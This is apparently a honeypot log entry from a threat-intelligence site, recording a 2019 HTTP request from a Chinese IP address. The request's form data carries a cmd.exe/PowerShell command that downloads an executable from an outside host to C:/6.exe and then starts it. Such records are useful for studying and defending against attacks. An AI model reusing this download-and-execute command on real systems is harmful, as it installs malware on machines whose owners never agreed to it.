Attack dad57090-ea74-4a9c-8424-ef397813e31d

Details

ID dad57090-ea74-4a9c-8424-ef397813e31d
Attack Type http
IP Address 124.205.27.10
Username
Password
Client Version Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Country China
Date 2019-01-19 04:05AM

Request Data

{
   "path": "",
   "method": "GET",
   "headers": {
     "Accept": "text/html, application/xhtml+xml, */*",
     "Connection": "Keep-Alive",
     "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
     "Cache-Control": "no-cache",
     "Accept-Encoding": "gbk, GB2312",
     "Accept-Language": "zh-cn"
   },
   "hostname": "168.235.81.160:8080",
   "form_data": {
     "xcmd": "cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/6.exe')",
     "start C:/6.exe": ""
   }
 }
© 2021 threat.gg